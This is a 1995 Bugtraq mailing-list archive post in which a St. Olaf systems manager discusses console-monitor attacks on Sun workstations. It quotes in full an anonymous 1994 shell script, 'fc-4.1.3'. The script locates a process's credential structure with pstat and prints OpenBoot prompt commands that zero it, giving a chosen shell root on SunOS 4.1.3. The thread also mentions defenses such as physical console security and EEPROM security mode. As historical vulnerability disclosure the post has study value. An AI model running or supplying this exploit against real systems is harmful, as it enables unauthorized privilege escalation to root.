Bugtraq mailing list archives
Re: Pointer to a process's credential structure?
From: fritchie () FreeNet MSP MN US (Scott Fritchie)
Date: Fri, 14 Apr 1995 13:47:26 -0500
On Fri, 14 Apr 1995 09:17:25 +0800, patrick () oes amdahl com (Patrick Horgan) said:
Browsing through some archived "bugtraq" messages I discovered a really nifty way to change the effective and real userid of any process running under SunOS 4.1.x (well, at least 4.1.2 and 4.1.3x). That particular hole is demonstrably exploitable under Solaris 2.3 (and I assume Solaris 2.4), except for one little problem....
ph> I'd have to think...we used to be able to do this via the prom ph> debugger. I'll attach the message I found browsing spy.org's Web server at the end of this one. It will probably be a good memory refresher. :-) ph> We wouldn't have to know any address ahead of time, but ph> could walk the kernels tables in the debugger from the prom ph> prompt. I'd thought of that, too. More work, though -- SunOS 4's "pstat" is so kind to give almost the exact address needed. ph> I'd hope everyone knows ph> that physical security is important, and that if you don't have it ph> your in deep doo-doo. You've got a point there. At St. Olaf, we've got our machines "protected" by the root password if you attempt to boot into single-user mode (and haven't really cared all that much if someone went to the trouble of bringing their own Sun-style-bootable drive), but finding out about the monitor attack was a cool (in a twisted sense) discovery. "eeprom security-mode=command (?)", here we come. -Scott --- Scott E. Lystig Fritchie, UNIX Systems Manager Co-founder: Academic Computing Center, St. Olaf College Twin Cities Free-Net 1510 St. Olaf Ave., Northfield, MN 55057 Organizing Committee fritchie () stolaf edu ... 507/646.3407 (Minneapolis/St. Paul, MN) "Activism is the killer app for the net." -- Steven Cherry <stc () panix com> --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- #!/bin/sh - # From: an100188 () anon penet fi # Subject: Breaking in from the monitor at the console # Date: Fri, 27 May 1994 15:34:36 UTC # To: bugtraq () crimelab com # # Breaking into a machine, typically a workstation, by using the monitor # at the console to poke values into memory has always been possible. I # didn't realize how simple and unobtrusive it was before I saw this # script. This one is for Suns, but the principle applies to any # machine with a console monitor. On Sun4s there is some sort of # "secure mode" that I presume lets you disable the monitor. It is # possible to change the L1-A sequence to another pair of keys, but if # you own /dev/console you can change it back. This obscurity may or # may not be useful. # # This particular attack needs a way to run the script on the machine, # typically in a shell. I presume there are other spots where you could # tickle a machine that don't even require that. Physically secure # consoles prevent this attack. # # Sigh. # # ---------------------------------------------------------------------------- # # Subject: Re: Breaking in from the monitor at the console # Date: Sat, 28 May 1994 10:15:52 UTC # To: bugtraq () crimelab com # # Oops, someone pointed out that the script was deleted by the anonymous # mail signature-remover. Sorry about that. Here's the script: # # # # Program: fc-4.1.3 # Author: Anonymous # Usage: fc-4.1.3 PID # PID is the PID of the shell you wish to give root to. # # Description: # Tell people how to give themselves root (on SunOS 4.1.3 machines) # # Give the program a known path PATH="/bin:/usr/etc:/usr/ucb" export PATH if [ $1x = x ]; then cat - << EOF Usage: $0 PID Where PID is the PID of the shell you want to give root to. Note - for csh the PID is stored in \$\$. EOF exit 1 fi # This is the start of the proc structure for a given PID. procp=`pstat -u $1 | grep procp | cut -f2` # This is really the only important information here. # This number is the offset of the pointer to the cred structure # in the proc structure. ucred="4c" cat - << EOF On the console press '<L1>a', you should see then see the following message: Type 'go' to resume ok type the following at the 'ok' prompt: b 2 do 0 $procp $ucred + l@ i + w! 2 +loop go Notes: * On some sun keyboards the '<L1>' key is labeled 'Stop'. * There is Emacs style line editing available at the 'ok' prompt. EOF exit 0
Current thread:
- Pointer to a process's credential structure? Scott Lystig Fritchie (Apr 12)
- Re: Pointer to a process's credential structure? John F. Haugh II (Apr 16)
- Re: Pointer to a process's credential structure? John C. Orthoefer (Apr 16)
- Re: Pointer to a process's credential structure? Scott Lystig Fritchie (Apr 17)
- Welcome to bugtraq Majordomo () fc net (Apr 20)
- <Possible follow-ups>
- Re: Pointer to a process's credential structure? Patrick Horgan (Apr 13)
- Re: Pointer to a process's credential structure? Scott Fritchie (Apr 14)
- Re: Pointer to a process's credential structure? Frank Byrum (Apr 14)